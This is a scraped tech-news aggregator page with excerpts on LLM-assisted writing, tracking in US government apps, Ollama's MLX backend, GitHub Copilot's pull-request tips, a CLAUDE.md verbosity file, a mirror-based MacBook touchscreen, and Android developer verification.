The sec­ond or­der goal of writ­ing is to be­come more ca­pa­ble. It is like work­ing out. Every time you do a rep on the bound­ary of what you can do, you get stronger. It is un­com­fort­able and ef­fort­ful.

Letting an LLM write for you is like pay­ing some­body to work out for you.

There are so­cial ef­fects to LLM-generated writ­ing too. When I send some­body a doc­u­ment that whiffs of LLM, I’m only demon­strat­ing that the LLM pro­duced some­thing ap­prox­i­mat­ing what oth­ers want to hear. I’m not show­ing that I con­tended with the ideas.

It un­der­mines my cred­i­bil­ity as a per­son who could lead what­ever ini­tia­tive comes out of this doc­u­ment. That’s un­for­tu­nate. I could have used this op­por­tu­nity to es­tab­lish cred­i­bil­ity.

LLM-generated writ­ing un­der­mines the au­then­tic­ity of not just one’s writ­ing but of the think­ing be­hind it as well. If the prose is au­to­mat­i­cally gen­er­ated, might the ideas be too?

How LLMs can be used in the writ­ing process

LLMs are use­ful for re­search and check­ing your work. They can also work well for quickly record­ing in­for­ma­tion or tran­scrib­ing text (neither of which are what I mean by writing”, as in writing an es­say”).

They are par­tic­u­larly good at gen­er­at­ing ideas. They thrive in this use case be­cause if they gen­er­ate 10 things and only one is use­ful, no harm is done. You can take what is use­ful and leave the rest be­hind.

These LLMs will in­crease ef­fi­ciency in de­liv­er­ing soft­ware. But in or­der to make the most of them, we need a si­mul­ta­ne­ous rise in our level of thought­ful­ness.

...

Read the original on alexhwoods.com »

4 643 shares, 28 trendiness

13 Government Apps That Spy Harder Than the Apps They Ban

The fed­eral gov­ern­ment re­leased an app yes­ter­day, March 27th, and it’s spy­ware.

The White House app mar­kets it­self as a way to get unparalleled ac­cess” to the Trump ad­min­is­tra­tion, with press re­leases, livestreams, and pol­icy up­dates. The kind of con­tent that every RSS feed on the planet de­liv­ers with one per­mis­sion: net­work ac­cess. But the White House app, ver­sion 47.0.1 (because sub­tlety died a long time ago), re­quests pre­cise GPS lo­ca­tion, bio­met­ric fin­ger­print ac­cess, stor­age mod­i­fi­ca­tion, the abil­ity to run at startup, draw over other apps, view your Wi-Fi con­nec­tions, and read badge no­ti­fi­ca­tions. It also ships with 3 em­bed­ded track­ers in­clud­ing Huawei Mobile Services Core (yes, the Chinese com­pany the US gov­ern­ment sanc­tioned, ship­ping track­ing in­fra­struc­ture in­side the sit­ting pres­i­den­t’s of­fi­cial app), and it has an ICE tip line but­ton that redi­rects straight to ICEs re­port­ing page.

This thing also has a Text the President” but­ton that auto-fills your mes­sage with Greatest President Ever!” and then col­lects your name and phone num­ber. There’s no spe­cific pri­vacy pol­icy for the app, just a generic white­house.gov pol­icy that does­n’t ad­dress any of the ap­p’s track­ing ca­pa­bil­i­ties.

The White House app might ac­tu­ally be one of the milder ones. I’ve been go­ing through every fed­eral agency app I can find on Google Play, pulling their per­mis­sions from Exodus Privacy (which au­dits Android APKs for track­ers and per­mis­sions), and what I found de­serves its own term. I’m call­ing it Fedware.

Ok so let me walk you through what the fed­eral gov­ern­ment is run­ning on your phone.

The FBIs app, myFBI Dashboard, re­quests 12 per­mis­sions in­clud­ing stor­age mod­i­fi­ca­tion, Wi-Fi scan­ning, ac­count dis­cov­ery (it can see what ac­counts are on your de­vice), phone state read­ing, and auto-start at boot. It also con­tains 4 track­ers, one of which is Google AdMob, which means the FBIs of­fi­cial app ships with an ad-serv­ing SDK while also read­ing your phone iden­tity. From what I found, the FBIs news app has more track­ers em­bed­ded than most weather apps.

The FEMA app re­quests 28 per­mis­sions in­clud­ing pre­cise and ap­prox­i­mate lo­ca­tion, and has gone from 4 track­ers in older ver­sions down to 1 in v3.0.14. Twenty-eight per­mis­sions for an app whose pri­mary func­tion is show­ing you weather alerts and shel­ter lo­ca­tions. To put that in con­text, the AP News app de­liv­ers the same kind of dis­as­ter cov­er­age with a frac­tion of the per­mis­sions.

IRS2Go has 3 track­ers and 10 per­mis­sions in its lat­est ver­sion, and ac­cord­ing to a TIGTA au­dit, the IRS re­leased this app to the pub­lic be­fore the re­quired Privacy Impact Assessment was even signed, which vi­o­lated OMB Circular A-130. The app shares de­vice IDs, app ac­tiv­ity, and crash logs with third par­ties, and TIGTA found that the IRS never con­firmed that fil­ing sta­tus and re­fund amounts were masked and en­crypted in the app in­ter­face.

MyTSA comes in lighter with 9 per­mis­sions and 1 tracker, but still re­quests pre­cise and ap­prox­i­mate lo­ca­tion. The TSAs own Privacy Impact Assessment says the app stores lo­ca­tion lo­cally and claims it never trans­mits GPS data to TSA. I’ll give them credit for doc­u­ment­ing that, be­cause most of these apps have pri­vacy poli­cies that read like ran­som notes.

CBP Mobile Passport Control is where things get gen­uinely alarm­ing. This one re­quests 14 per­mis­sions in­clud­ing 7 clas­si­fied as dangerous”: back­ground lo­ca­tion track­ing (it fol­lows you even when the app is closed), cam­era ac­cess, bio­met­ric au­then­ti­ca­tion, and full ex­ter­nal stor­age read/​write. And the whole CBP ecosys­tem, from CBP One to CBP Home to Mobile Passport Control, feeds data into a net­work that re­tains your faceprints for up to 75 years and shares it across DHS, ICE, and the FBI.

The gov­ern­ment also built a fa­cial recog­ni­tion app called Mobile Fortify that ICE agents carry in the field. It draws from hun­dreds of mil­lions of im­ages across DHS, FBI, and State Department data­bases. ICE Homeland Security Investigations signed a $9.2 mil­lion con­tract with Clearview AI in September 2025, giv­ing agents ac­cess to over 50 bil­lion fa­cial im­ages scraped from the in­ter­net. DHSs own in­ter­nal doc­u­ments ad­mit Mobile Fortify can be used to amass bi­o­graph­i­cal in­for­ma­tion of individuals re­gard­less of cit­i­zen­ship or im­mi­gra­tion sta­tus”, and CBP con­firmed it will retain all pho­tographs” in­clud­ing those of U. S. cit­i­zens, for 15 years.

Photos sub­mit­ted through CBP Home, bio­met­ric scans from Mobile Passport Control, and faces cap­tured by Mobile Fortify all feed this sys­tem. And the EFF found that ICE does not al­low peo­ple to opt out of be­ing scanned, and agents can use a fa­cial recog­ni­tion match to de­ter­mine your im­mi­gra­tion sta­tus even when other ev­i­dence con­tra­dicts it. A U. S.-born cit­i­zen was told he could be de­ported based on a bio­met­ric match alone.

SmartLINK is the ICE elec­tronic mon­i­tor­ing app, built by BI Incorporated, a sub­sidiary of the GEO Group (a pri­vate prison com­pany that prof­its di­rectly from how many peo­ple ICE mon­i­tors), un­der a $2.2 bil­lion con­tract. The app col­lects ge­olo­ca­tion, fa­cial im­ages, voice prints, med­ical in­for­ma­tion in­clud­ing preg­nancy data, and phone num­bers of your con­tacts. ICEs con­tract gives them unlimited rights to use, dis­pose of, or dis­close” all data col­lected. The ap­p’s for­mer terms of ser­vice al­lowed shar­ing virtually any in­for­ma­tion col­lected through the ap­pli­ca­tion, even be­yond the scope of the mon­i­tor­ing plan.” SmartLINK went from 6,000 users in 2019 to over 230,000 by 2022, and in 2019, ICE used GPS data from these mon­i­tors to co­or­di­nate one of the largest im­mi­gra­tion raids in his­tory, ar­rest­ing around 700 peo­ple across six cities in Mississippi.

And if you think your lo­ca­tion data is safe be­cause you use reg­u­lar apps and avoid gov­ern­ment ones, the fed­eral gov­ern­ment is buy­ing that data too. Companies like Venntel col­lect 15 bil­lion lo­ca­tion points from over 250 mil­lion de­vices every day through SDKs em­bed­ded in over 80,000 apps (weather, nav­i­ga­tion, coupons, games). DHS, FBI, DOD, and the DEA pur­chase this data with­out war­rants, cre­at­ing a con­sti­tu­tional loop­hole around the Supreme Court’s 2018 Carpenter v. United States rul­ing that re­quires a war­rant for cell­phone lo­ca­tion his­tory. The Defense Department even pur­chased lo­ca­tion data from prayer apps to mon­i­tor Muslim com­mu­ni­ties. Police de­part­ments used sim­i­lar data to track racial jus­tice pro­test­ers.

And then there’s the IRS-ICE data shar­ing deal from April 2025. The IRS and ICE signed a Memorandum of Understanding al­low­ing ICE to re­ceive names, ad­dresses, and tax data for peo­ple with re­moval or­ders. ICE sub­mit­ted 1.28 mil­lion names. The IRS er­ro­neously shared the data of thou­sands of peo­ple who should never have been in­cluded. The act­ing IRS Commissioner, Melanie Krause, re­signed in protest. The chief pri­vacy of­fi­cer quit. One per­son leav­ing changes noth­ing about the in­sti­tu­tion, and the data was al­ready out the door. A fed­eral judge blocked fur­ther shar­ing in November 2025, rul­ing it likely vi­o­lates IRS con­fi­den­tial­ity pro­tec­tions, but by then the IRS was al­ready build­ing an au­to­mated sys­tem to give ICE bulk ac­cess to home ad­dresses with min­i­mal hu­man over­sight. The court or­der is a speed bump, and they’ll find an­other route.

The apps, the data­bases, and the data bro­ker con­tracts all feed the same pipeline, and no sin­gle agency con­trols it be­cause they all share it.

The GAO re­ported in 2023 that nearly 60% of 236 pri­vacy and se­cu­rity rec­om­men­da­tions is­sued since 2010 had still not been im­ple­mented. Congress has been told twice, in 2013 and 2019, to pass com­pre­hen­sive in­ter­net pri­vacy leg­is­la­tion. It has done nei­ther. And it won’t, be­cause the sur­veil­lance ap­pa­ra­tus serves the peo­ple who run it, and the peo­ple who run it write the laws. Oversight is the­ater. The GAO is­sues a re­port, Congress holds a hear­ing, every­one per­forms con­cern for the cam­eras, and then the con­tracts get re­newed and the data keeps flow­ing. It’s work­ing ex­actly as de­signed.

The fed­eral gov­ern­ment pub­lishes con­tent avail­able through stan­dard web pro­to­cols and RSS feeds, then wraps that con­tent in ap­pli­ca­tions that de­mand ac­cess to your lo­ca­tion, bio­met­rics, stor­age, con­tacts, and de­vice iden­tity. They em­bed ad­ver­tis­ing track­ers in FBI apps. They sell the line that you need their app to re­ceive their pro­pa­ganda while the app qui­etly col­lects data that flows into the same sur­veil­lance pipeline feed­ing ICE raids and war­rant­less lo­ca­tion track­ing. Every sin­gle one of these apps could be re­placed by a web page, and they know that. The app ex­ists be­cause a web page can’t read your fin­ger­print, track your GPS in the back­ground, or in­ven­tory the other ac­counts on your de­vice.

You don’t need their app. You don’t need their per­mis­sion to ac­cess pub­lic in­for­ma­tion. You al­ready have a browser, an RSS reader, and the abil­ity to de­cide for your­self what runs on your own hard­ware. Use them.

...

Read the original on www.sambent.com »

5 551 shares, 40 trendiness

Ollama is now powered by MLX on Apple Silicon in preview · Ollama Blog

Today, we’re pre­view­ing the fastest way to run Ollama on Apple sil­i­con, pow­ered by MLX, Apple’s ma­chine learn­ing frame­work.

This un­locks new per­for­mance to ac­cel­er­ate your most de­mand­ing work on ma­cOS:

* Coding agents like Claude Code, OpenCode, or Codex

Ollama on Apple sil­i­con is now built on top of Apple’s ma­chine learn­ing frame­work, MLX, to take ad­van­tage of its uni­fied mem­ory ar­chi­tec­ture.

This re­sults in a large speedup of Ollama on all Apple Silicon de­vices. On Apple’s M5, M5 Pro and M5 Max chips, Ollama lever­ages the new GPU Neural Accelerators to ac­cel­er­ate both time to first to­ken (TTFT) and gen­er­a­tion speed (tokens per sec­ond).

Testing was con­ducted on March 29, 2026, us­ing Alibaba’s Qwen3.5-35B-A3B model quan­tized to `NVFP4` and Ollama’s pre­vi­ous im­ple­men­ta­tion quan­tized to `Q4_K_M` us­ing Ollama 0.18. Ollama 0.19 will see even higher per­for­mance (1851 to­ken/​s pre­fill and 134 to­ken/​s de­code when run­ning with `int4`).

Ollama now lever­ages NVIDIAs NVFP4 for­mat to main­tain model ac­cu­racy while re­duc­ing mem­ory band­width and stor­age re­quire­ments for in­fer­ence work­loads.

As more in­fer­ence providers scale in­fer­ence us­ing NVFP4 for­mat, this al­lows Ollama users to share the same re­sults as they would in a pro­duc­tion en­vi­ron­ment.

It fur­ther opens up Ollama to have the abil­ity to run mod­els op­ti­mized by NVIDIAs model op­ti­mizer. Other pre­ci­sions will be made avail­able based on the de­sign and us­age in­tent from Ollama’s re­search and hard­ware part­ners.

Ollama’s cache has been up­graded to make cod­ing and agen­tic tasks more ef­fi­cient.

* Lower mem­ory uti­liza­tion: Ollama will now reuse its cache across con­ver­sa­tions, mean­ing less mem­ory uti­liza­tion and more cache hits when branch­ing when us­ing a shared sys­tem prompt with tools like Claude Code.

* Intelligent check­points: Ollama will now store snap­shots of its cache at in­tel­li­gent lo­ca­tions in the prompt, re­sult­ing in less prompt pro­cess­ing and faster re­sponses.

* Smarter evic­tion: shared pre­fixes sur­vive longer even when older branches are dropped.

This pre­view re­lease of Ollama ac­cel­er­ates the new Qwen3.5-35B-A3B model, with sam­pling pa­ra­me­ters tuned for cod­ing tasks.

Please make sure you have a Mac with more than 32GB of uni­fied mem­ory.

ol­lama launch claude –model qwen3.5:35b-a3b-cod­ing-nvfp4

ol­lama launch open­claw –model qwen3.5:35b-a3b-cod­ing-nvfp4

ol­lama run qwen3.5:35b-a3b-cod­ing-nvfp4

We are ac­tively work­ing to sup­port fu­ture mod­els. For users with cus­tom mod­els fine-tuned on sup­ported ar­chi­tec­tures, we will in­tro­duce an eas­ier way to im­port mod­els into Ollama. In the mean­time, we will ex­pand the list of sup­ported ar­chi­tec­tures.

Thank you to:

* The MLX con­trib­u­tor team who built an in­cred­i­ble ac­cel­er­a­tion frame­work

* The GGML & llama.cpp team who built a thriv­ing lo­cal frame­work and com­mu­nity

* The Alibaba Qwen team for open-sourc­ing ex­cel­lent mod­els and their col­lab­o­ra­tion

...

Read the original on ollama.com »

6 514 shares, 42 trendiness

GitHub backs down, kills Copilot PR ‘tips’ after backlash

Updated Microsoft has done a 180. Following back­lash from de­vel­op­ers, GitHub has re­moved Copilot’s abil­ity to stick ads - what it calls tips” - into any pull re­quest that in­vokes its name.

Australian de­vel­oper Zach Manson noted on Monday that, af­ter a coworker asked Copilot to cor­rect a typo in one of his pull re­quests, he was sur­prised to find a mes­sage from Copilot in the PR push­ing read­ers to adopt pro­duc­tiv­ity app Raycast.

Quickly spin up Copilot cod­ing agents from any­where on your ma­cOS or Windows ma­chine with Raycast,” the note read with a light­ning bolt emoji and link to in­stall Raycast.

Initially I thought there was some kind of train­ing data poi­son­ing or novel prompt in­jec­tion and the Raycast team was do­ing some elab­o­rate proof of con­cept mar­ket­ing,” Manson told The Register in an email.

But no: Take a look around GitHub and you’ll see more than 11,400 PRs with the same tip in them, all seem­ingly added by Copilot. Take a look at the PRs’ code it­self and search for the block in­vok­ing Copilot to add a tip and you’ll find plenty more ex­am­ples of dif­fer­ent tips be­ing in­serted by Copilot.

Manson told us that he’s not sur­prised to see GitHub do­ing this with an AI model, but he said it’s pretty of­fen­sive to see the Raycast ad in­serted by Copilot into his own PR like he wrote it.

I was­n’t even aware that the GitHub Copilot Review in­te­gra­tion had the abil­ity to edit other users’ de­scrip­tions and com­ments,” Manson told us. I can’t think of a valid use case for that abil­ity.”

It was only Monday morn­ing when Microsoft watch­ers at Neowin picked up Manson’s re­port that Copilot was in­ject­ing what de­vel­op­ers saw as ads into PRs, and, by the af­ter­noon, GitHub had de­cided a re­cent change to Copilot may have gone a bit too far.

GitHub VP of de­vel­oper re­la­tions Martin Woodward ex­plained in a post on X later in the day Monday that Copilot in­sert­ing ads into PRs is­n’t ac­tu­ally new be­hav­ior - it’s been do­ing so in the ones it cre­ates for a while. Letting Copilot touch PRs it did­n’t cre­ate, but is men­tioned in, on the other hand, is new be­hav­ior that has­n’t re­ally worked out.

[When] we added the abil­ity to have Copilot work on any PR by men­tion­ing it the be­hav­iour be­came icky,” Woodward said.

Tim Rogers, prin­ci­pal prod­uct man­ager for Copilot at GitHub, took to Hacker News on Monday to say that giv­ing Copilot the abil­ity to add tips” to PRs was in­tended to help de­vel­op­ers learn new ways to use the agent in their work­flow.”

Hearing feed­back from the com­mu­nity fol­low­ing Manson’s post and the ker­fuf­fle it gen­er­ated, Rogers said, has helped him re­al­ize that on re­flec­tion,” let­ting Copilot make changes to PRs writ­ten by a hu­man with­out their knowl­edge was the wrong judge­ment call.”

We’ve now dis­abled these tips in pull re­quests cre­ated by or touched by Copilot, so you won’t see this hap­pen again,” Rogers added. ®

Martin Woodward, VP of Developer Relations, GitHub, said in a state­ment: GitHub does not and does not plan to in­clude ad­ver­tise­ments in GitHub. We iden­ti­fied a pro­gram­ming logic is­sue with a GitHub Copilot cod­ing agent tip that sur­faced in the wrong con­text within a pull re­quest com­ment. We have re­moved agent tips from pull re­quest com­ments mov­ing for­ward.”

...

Read the original on www.theregister.com »

7 419 shares, 24 trendiness

cut Claude output tokens by 63%. Drop-in. No code changes.

One file. Drop it in your pro­ject. Cuts Claude out­put ver­bosity by ~63%. No code changes re­quired. Note: most Claude costs come from in­put to­kens, not out­put. This file tar­gets out­put be­hav­ior - syco­phancy, ver­bosity, for­mat­ting noise. It won’t fix your biggest bill but it will fix your most an­noy­ing re­sponses. Model sup­port: bench­marks were run on Claude only. The rules are model-ag­nos­tic and should work on any model that reads con­text - but re­sults on lo­cal mod­els like llama.cpp, Mistral, or oth­ers are untested. Community re­sults wel­come.

When you use Claude Code, every word Claude gen­er­ates costs to­kens. Most peo­ple never con­trol how Claude re­sponds - they just get what­ever the model de­cides to out­put.

* Opens every re­sponse with Sure!”, Great ques­tion!”, Absolutely!”

* Ends with I hope this helps! Let me know if you need any­thing!”

* Restates your ques­tion be­fore an­swer­ing it

* Adds un­so­licited sug­ges­tions be­yond what you asked

* Over-engineers code with ab­strac­tions you never re­quested

All of this wastes to­kens. None of it adds value.

Drop CLAUDE.md into your pro­ject root. Claude Code reads it au­to­mat­i­cally. Behavior changes im­me­di­ately.

This file works best for:

* Repeated struc­tured tasks where Claude’s de­fault ver­bosity com­pounds across hun­dreds of calls

* Teams who need con­sis­tent, parseable out­put for­mat across ses­sions

This file is not worth it for:

* Single short queries - the file loads into con­text on every mes­sage, so on low-out­put ex­changes it is a net to­ken in­crease

* Casual one-off use - the over­head does­n’t pay off at low vol­ume

* Fixing deep fail­ure modes like hal­lu­ci­nated im­ple­men­ta­tions or ar­chi­tec­tural drift - those re­quire hooks, gates, and me­chan­i­cal en­force­ment

* Pipelines us­ing mul­ti­ple fresh ses­sions per task - fresh ses­sions don’t carry the CLAUDE.md over­head ben­e­fit the same way per­sis­tent ses­sions do

* Parser re­li­a­bil­ity at scale - if you need guar­an­teed parseable out­put, use struc­tured out­puts (JSON mode, tool use with schemas) built into the API - that is a more ro­bust so­lu­tion than prompt-based for­mat­ting rules

* Exploratory or ar­chi­tec­tural work where de­bate, push­back, and al­ter­na­tives are the point - the over­ride rule lets you ask for that any time, but if that’s your pri­mary work­flow this file will feel re­stric­tive

The hon­est trade-off:

The CLAUDE.md file it­self con­sumes in­put to­kens on every mes­sage. The sav­ings come from re­duced out­put to­kens. The net is only pos­i­tive when out­put vol­ume is high enough to off­set the per­sis­tent in­put cost. At low us­age it costs more than it saves.

Same 5 prompts. Run with­out CLAUDE.md (baseline) then with CLAUDE.md (optimized).

~295 words saved per 4 prompts. Same in­for­ma­tion. Zero sig­nal loss.

Methodology note: This is a 5-prompt di­rec­tional in­di­ca­tor (T1-T3, T5 for word re­duc­tion; T4 is a for­mat test), not a sta­tis­ti­cally con­trolled study. Claude’s out­put length varies nat­u­rally be­tween iden­ti­cal prompts. No vari­ance con­trols or re­peated runs were ap­plied. Treat the 63% as a di­rec­tional sig­nal for out­put-heavy use cases, not a pre­cise uni­ver­sal mea­sure­ment. The CLAUDE.md file it­self adds in­put to­kens on every mes­sage - net sav­ings only ap­ply when out­put vol­ume is high enough to off­set that per­sis­tent cost.

Scope rules to your ac­tual fail­ure modes, not generic ones.

Generic rules like be con­cise” help but the real wins come from tar­get­ing spe­cific fail­ures you’ve ac­tu­ally hit. For ex­am­ple if Claude silently swal­lows er­rors in your pipeline, add a rule like: when a step fails, stop im­me­di­ately and re­port the full er­ror with trace­back be­fore at­tempt­ing any fix.” Specific beats generic every time.

CLAUDE.md files com­pose - use that.

Claude reads mul­ti­ple CLAUDE.md files at once - global (~/.claude/CLAUDE.md), pro­ject-level, and sub­di­rec­tory-level. This means:

* Keep gen­eral pref­er­ences (tone, for­mat, ASCII rules) in your global file

* Keep pro­ject-spe­cific con­straints (“never mod­ify /config with­out con­fir­ma­tion”) at the pro­ject level

This avoids bloat­ing any sin­gle file and keeps rules close to where they ap­ply.

Different pro­ject types need dif­fer­ent lev­els of com­pres­sion. Pick the base file + a pro­file, or use the base alone.

curl -o CLAUDE.md https://​raw.githubuser­con­tent.com/​dron­a23/​claude-to­ken-ef­fi­cient/​main/​CLAUDE.md

git clone https://​github.com/​dron­a23/​claude-to­ken-ef­fi­cient

cp claude-to­ken-ef­fi­cient/​pro­files/​CLAUDE.cod­ing.md your-pro­ject/​CLAUDE.md

Option 3 - Manual:

Copy the con­tents of CLAUDE.md from this repo into your pro­ject root.

User in­struc­tions al­ways win. If you ex­plic­itly ask for a de­tailed ex­pla­na­tion or ver­bose out­put, Claude will fol­low your in­struc­tion - the file never fights you.

Found a be­hav­ior that CLAUDE.md can fix? Open an is­sue with:

The an­noy­ing be­hav­ior (what Claude does by de­fault)

The prompt that trig­gers it

Community sub­mis­sions be­come part of the next ver­sion with full credit.

This pro­ject was built on real com­plaints from the Claude com­mu­nity. Full credit to every source that con­tributed a fix:

MIT - free to use, mod­ify, and dis­trib­ute.

Built by Drona Gangarapu - open to PRs, is­sues, and pro­file con­tri­bu­tions.

...

Read the original on github.com »

8 389 shares, 16 trendiness

Turning a MacBook into a Touchscreen with $1 of Hardware

We turned a MacBook into a touch­screen us­ing only $1 of hard­ware and a lit­tle bit of com­puter vi­sion. The proof-of-con­cept, dubbed Project Sistine” af­ter our recre­ation of the fa­mous paint­ing in the Sistine Chapel, was pro­to­typed by me, Kevin, Guillermo, and Logan in about 16 hours.

The ba­sic prin­ci­ple be­hind Sistine is sim­ple. Surfaces viewed from an an­gle tend to look shiny, and you can tell if a fin­ger is touch­ing the sur­face by check­ing if it’s touch­ing its own re­flec­tion.

Kevin, back in mid­dle school, no­ticed this phe­nom­e­non and built ShinyTouch, uti­liz­ing an ex­ter­nal we­b­cam to build a touch in­put sys­tem re­quir­ing vir­tu­ally no setup. We wanted to see if we could minia­tur­ize the idea and make it work with­out an ex­ter­nal we­b­cam. Our idea was to retro­fit a small mir­ror in front of a MacBook’s built-in we­b­cam, so that the we­b­cam would be look­ing down at the com­puter screen at a sharp an­gle. The cam­era would be able to see fin­gers hov­er­ing over or touch­ing the screen, and we’d be able to trans­late the video feed into touch events us­ing com­puter vi­sion.

Our hard­ware setup was sim­ple. All we needed was to po­si­tion a mir­ror at the ap­pro­pri­ate an­gle in front of the we­b­cam. Here is our bill of ma­te­ri­als:

After some it­er­a­tion, we set­tled on a de­sign that could be as­sem­bled in min­utes us­ing a knife and a hot glue gun.

The first step in pro­cess­ing video frames is de­tect­ing the fin­ger. Here’s a typ­i­cal ex­am­ple of what the we­b­cam sees:

The fin­ger de­tec­tion al­go­rithm needs to find the touch/​hover point for fur­ther pro­cess­ing. Our cur­rent ap­proach uses clas­si­cal com­puter vi­sion tech­niques. The pro­cess­ing pipeline con­sists of the fol­low­ing steps:

Find the two largest con­tours and en­sure that the con­tours over­lap in the

hor­i­zon­tal di­rec­tion and the smaller one is above the larger one

Identify the touch/​hover point as the mid­point of the line con­nect­ing the

top of the bot­tom con­tour and the bot­tom of the top con­tour

Distinguish be­tween touch and hover based on the ver­ti­cal dis­tance be­tween

the two con­tours

Shown above is the re­sult of ap­ply­ing this process to a frame from the we­b­cam. The fin­ger and re­flec­tion (contours) are out­lined in green, the bound­ing box is shown in red, and the touch point is shown in ma­genta.

The fi­nal step in pro­cess­ing the in­put is map­ping the touch/​hover point from we­b­cam co­or­di­nates to on-screen co­or­di­nates. The two are re­lated by a

ho­mog­ra­phy. We com­pute the ho­mog­ra­phy ma­trix through a cal­i­bra­tion process where the user is prompted to touch spe­cific points on the screen. After we col­lect data match­ing we­b­cam co­or­di­nates with on-screen co­or­di­nates, we can es­ti­mate the ho­mog­ra­phy ro­bustly us­ing RANSAC. This gives us a pro­jec­tion ma­trix that maps we­b­cam co­or­di­nates to on-screen co­or­di­nates.

The video above demon­strates the cal­i­bra­tion process, where the user has to fol­low a green dot around the screen. The video in­cludes some de­bug in­for­ma­tion, over­laid on live video from the we­b­cam. The touch point in we­b­cam co­or­di­nates is shown in ma­genta. After the cal­i­bra­tion process is com­plete, the pro­jec­tion ma­trix is vi­su­al­ized with red lines, and the soft­ware switches to a mode where the es­ti­mated touch point is shown as a blue dot.

In the cur­rent pro­to­type, we trans­late hover and touch into mouse events, mak­ing ex­ist­ing ap­pli­ca­tions in­stantly touch-en­abled.

If we were writ­ing our own touch-en­abled apps, we could di­rectly make use of touch data, in­clud­ing in­for­ma­tion such as hover height.

Project Sistine is a proof-of-con­cept that turns a lap­top into a touch­screen us­ing only $1 of hard­ware, and for a pro­to­type, it works pretty well! With some sim­ple mod­i­fi­ca­tions such as a higher res­o­lu­tion we­b­cam (ours was 480p) and a curved mir­ror that al­lows the we­b­cam to cap­ture the en­tire screen, Sistine could be­come a prac­ti­cal low-cost touch­screen sys­tem.

Our Sistine pro­to­type is open source, re­leased un­der the MIT License.

...

Read the original on anishathalye.com »

9 311 shares, 14 trendiness

Rolling out to all developers on Play Console and Android Developer Console

The lat­est Android and Google Play news for app and game

de­vel­op­ers.

Android de­vel­oper ver­i­fi­ca­tion: Rolling out to all de­vel­op­ers on Play Console and Android Developer Console

Android is for every­one. It’s built on a com­mit­ment to an open and safe plat­form. Users should feel con­fi­dent in­stalling apps, no mat­ter where they get them from. However, our re­cent analy­sis found over 90 times more mal­ware from side­loaded sources than on Google Play. So as an ex­tra layer of se­cu­rity, we are rolling out Android de­vel­oper ver­i­fi­ca­tion to help pre­vent ma­li­cious ac­tors from hid­ing be­hind anonymity to re­peat­edly spread harm. Over the past sev­eral months, we’ve worked closely with the com­mu­nity to im­prove the de­sign so we ac­count for the many ways peo­ple use Android to bal­ance open­ness with safety.

Today, we’re start­ing to roll out Android de­vel­oper ver­i­fi­ca­tion to all de­vel­op­ers in both the new Android Developer Console and Play Console. This al­lows you to com­plete your ver­i­fi­ca­tion and reg­is­ter your apps be­fore user-fac­ing changes be­gin later this year.

If you only dis­trib­ute apps out­side of Google Play, you can cre­ate an ac­count in Android Developer Console to­day.

If you’re on Google Play, check your Play Console ac­count for up­dates over the next few weeks. If you’ve al­ready ver­i­fied your iden­tity here, then you’re likely al­ready set.

Most of your users’ down­load ex­pe­ri­ence will not change at all

While ver­i­fi­ca­tion tools are rolling out now, the ex­pe­ri­ence for users down­load­ing your apps will not change un­til later this year. The user side pro­tec­tions will first go live in Brazil, Indonesia, Singapore, and Thailand this September, be­fore ex­pand­ing glob­ally in 2027. We’ve shared this time­line early to en­sure you have am­ple time to com­plete your ver­i­fi­ca­tion.

Following this dead­line, for the vast ma­jor­ity of users, the ex­pe­ri­ence of in­stalling apps will stay ex­actly the same. It’s only when a user tries to in­stall an un­reg­is­tered app that they’ll re­quire ADB or ad­vanced flow, help­ing us keep the broader com­mu­nity safe while pre­serv­ing the flex­i­bil­ity for our power users.

Developers can still choose where to dis­trib­ute their apps. Most users’ down­load ex­pe­ri­ence will not change

Tailoring the ver­i­fi­ca­tion ex­pe­ri­ence to your feed­back

To bal­ance the need for safety with our com­mit­ment to open­ness, we’ve im­proved the ver­i­fi­ca­tion ex­pe­ri­ence based on your feed­back. We’ve stream­lined the de­vel­oper ex­pe­ri­ence to be more in­te­grated with ex­ist­ing work­flows and main­tained choice for power users.

For Android Studio de­vel­op­ers: In the next two months, you’ll see your ap­p’s reg­is­tra­tion sta­tus right in Android Studio when you gen­er­ate a signed App Bundle or APK.

You’ll see your ap­p’s reg­is­tra­tion sta­tus in Android Studio when you gen­er­ate a signed App Bundle or APK.

For Play de­vel­op­ers: If you’ve com­pleted Play Console’s de­vel­oper ver­i­fi­ca­tion re­quire­ments, your iden­tity is al­ready ver­i­fied and we’ll au­to­mat­i­cally reg­is­ter el­i­gi­ble Play apps for you. In the rare case that we are un­able to reg­is­ter your apps for you, you will need to fol­low the man­ual app claim process. Over the next cou­ple of weeks, more de­tails will be pro­vided in the Play Console and through email. Also, you’ll be able to reg­is­ter apps you dis­trib­ute out­side of Play in the Play Console too.

The Android de­vel­oper ver­i­fi­ca­tion page in your Play Console will show the reg­is­tra­tion sta­tus for each of your apps.

For stu­dents and hob­by­ists: To keep Android ac­ces­si­ble to every­one, we’re build­ing a free, no gov­ern­ment ID re­quired, lim­ited dis­tri­b­u­tion ac­count so you can share your work with up to 20 de­vices. You only need an email ac­count to get started. Sign up for early ac­cess. We’ll send in­vites in June.

For power users: We are main­tain­ing the choice to in­stall apps from any source. You can use the new ad­vanced flow for side­load­ing un­reg­is­tered apps or con­tinue us­ing ADB. This main­tains choice while pro­tect­ing vul­ner­a­ble users.

We’re rolling this out care­fully and work­ing closely with de­vel­op­ers, users, and our part­ners. In April, we’ll in­tro­duce Android Developer Verifier, a new Google sys­tem ser­vice that will be used to check if an app is reg­is­tered to a ver­i­fied de­vel­oper.

April 2026: Users will start to see Android Developer Verifier in their Google Systems ser­vices set­tings.

September 30, 2026: Apps must be reg­is­tered by ver­i­fied de­vel­op­ers in or­der to be in­stalled and up­dated on cer­ti­fied Android de­vices in Brazil, Indonesia, Singapore, and Thailand. Unregistered apps can be side­loaded with ADB or ad­vanced flow.

2027 and be­yond: We will roll out this re­quire­ment glob­ally.

We’re com­mit­ted to an Android that is both open and safe. Check out our de­vel­oper guides to get started to­day.

...

Read the original on android-developers.googleblog.com »

10 309 shares, 19 trendiness

- YouTube

...

Read the original on www.youtube.com »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.